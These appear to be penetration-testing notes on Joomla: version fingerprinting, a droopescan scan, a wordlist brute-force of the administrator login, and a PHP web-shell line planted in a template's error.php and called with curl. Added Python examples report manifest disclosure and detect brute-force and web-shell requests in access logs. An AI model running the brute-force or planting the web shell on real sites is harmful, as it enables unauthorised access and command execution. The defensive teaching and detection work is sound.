Joomla
Footprinting
# Confirm that the site is running Joomla
curl -s http://site.local/ | grep Joomla
# Fingerprint the Joomla version
curl -s http://site.local/README.txt | head -n 5
curl -s http://site.local/administrator/manifests/files/joomla.xml | xmllint --format -
# cache.xml gives an approximate version; it is located at plugins/system/cache/cache.xml.
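As an added example (mine, not part of these notes or of any Joomla project code), the script below parses the two manifests the commands above fetch and reports what an anonymous reader learns from them: the release in joomla.xml is exact, the one in cache.xml is only approximate, and either can be compared against the release the operator believes is deployed. The XML bodies are constructed samples in the manifest layout, not captured from a live site; fetching them over HTTP is left to curl as above.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the layout of administrator/manifests/files/joomla.xml
JOOMLA_MANIFEST = """\
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.9.12</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

# Constructed sample in the layout of plugins/system/cache/cache.xml
CACHE_MANIFEST = """\
<extension version="3.1" type="plugin" group="system" method="upgrade">
    <name>plg_system_cache</name>
    <version>3.0.0</version>
</extension>
"""


def manifest_info(xml_text):
    """Return (extension name, version string) from an extension manifest,
    or (None, None) when the body is not a well-formed manifest, e.g. a 404
    page or a directory listing that came back instead of the file."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None, None
    if root.tag != "extension":
        return None, None
    return root.findtext("name"), root.findtext("version")


def parse_version(text):
    """Turn '3.9.12' (or '3.9') into a tuple so releases compare numerically
    rather than as strings, where '3.10.0' would wrongly sort before '3.9.12'."""
    if text is None:
        return None
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        return None
    return tuple(int(part) if part else 0 for part in m.groups())


def disclosure_report(xml_text, expected_version):
    """Summarise what a reachable manifest discloses and whether that release
    is older than the one the operator has on record. files_joomla is the
    core manifest and gives the exact release; any other manifest (the cache
    plugin, for instance) only approximates it."""
    name, version = manifest_info(xml_text)
    disclosed, expected = parse_version(version), parse_version(expected_version)
    return {
        "name": name,
        "version": version,
        "precision": None if name is None else ("exact" if name == "files_joomla" else "approximate"),
        "behind_expected": bool(disclosed and expected and disclosed < expected),
    }


if __name__ == "__main__":
    # "3.9.15" is an assumed operator-side record, not a value from the notes
    for label, xml_text in (("joomla.xml", JOOMLA_MANIFEST), ("cache.xml", CACHE_MANIFEST)):
        print(label, disclosure_report(xml_text, "3.9.15"))
```

Run it against the body of a real fetch by passing the response text to disclosure_report(); a non-None name means the manifest is world-readable, which on its own is worth fixing at the web server regardless of the version it reveals.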
Enumeration
# Install droopescan
sudo pip3 install droopescan
# Normal scan
droopescan scan joomla --url http://site.local/
# Brute-force the administrator password
# joomla-brute
# Link: https://github.com/ajnik/joomla-bruteforce
sudo python3 joomla-brute.py -u http://site.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
Attacking Joomla
Code Execution
# PHP code to include in the template's error.php page to get code execution
# The parameter name is the MD5 of 'cmd': dcfdd5e021a869fcc6dfaef8bf31377e
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
# Using curl to execute commands
curl -s "http://site.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id"
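The detection side of the two techniques above (the wordlist run against /administrator/ and the error.php one-liner), as an added example that is not part of the original notes. It parses Apache combined-format access log lines and flags two things: a client that POSTs to /administrator/index.php ten or more times inside a minute, and any client that requests a PHP file under templates/ directly, which Joomla never does on its own because template files are included server-side. The log lines, client addresses and timestamps are constructed, and the 10-in-60-seconds threshold is an assumption to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: client, identd, user, [timestamp], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Direct request for a PHP file under templates/. Joomla includes template
# files server-side, so a client asking for one by URL is not normal traffic.
TEMPLATE_PHP = re.compile(r"^/templates/[^/]+/.*\.php(?:/|$)")

# Constructed sample log: one legitimate admin session, and one client that
# guesses passwords for half a minute and then calls the dropped error.php.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:54:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:54:10 +0000] "GET /templates/protostar/css/template.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:54:20 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
] + [
    f'203.0.113.5 - - [10/Oct/2023:13:55:{sec:02d} +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.31"'
    for sec in range(0, 36, 3)  # 12 login attempts in 33 seconds
] + [
    '203.0.113.5 - - [10/Oct/2023:13:57:00 +0000] "GET /templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id HTTP/1.1" 200 312 "-" "curl/8.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None for lines that do
    not match (truncated writes, a different log format)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def login_bursts(records, threshold=10, window_s=60):
    """Return {ip: total POSTs} for clients that POSTed to the administrator
    login entry point at least `threshold` times inside any `window_s` second
    window. The sliding window over sorted timestamps leaves a slow, steady
    admin alone while a wordlist run trips it."""
    posts = defaultdict(list)
    for r in records:
        if r["method"] == "POST" and urlsplit(r["target"]).path == "/administrator/index.php":
            posts[r["ip"]].append(r["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def direct_template_requests(records):
    """Return one finding per request that fetches a template PHP file by URL,
    with the query parameter names, so a reviewer can pull that file from
    disk and diff it against the packaged template."""
    hits = []
    for r in records:
        parts = urlsplit(r["target"])
        if TEMPLATE_PHP.match(parts.path):
            hits.append({
                "ip": r["ip"],
                "path": parts.path,
                "params": sorted(parse_qs(parts.query, keep_blank_values=True)),
            })
    return hits


def analyse(lines):
    """Run both detections over raw log lines and return the findings."""
    records = [rec for rec in map(parse_line, lines) if rec]
    return {"login_bursts": login_bursts(records), "template_php": direct_template_requests(records)}


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Feed analyse() the lines of the real access log; the template_php findings are the ones to act on immediately, since a template PHP file that answers direct requests with a query string is almost certainly no longer the file that shipped with the template.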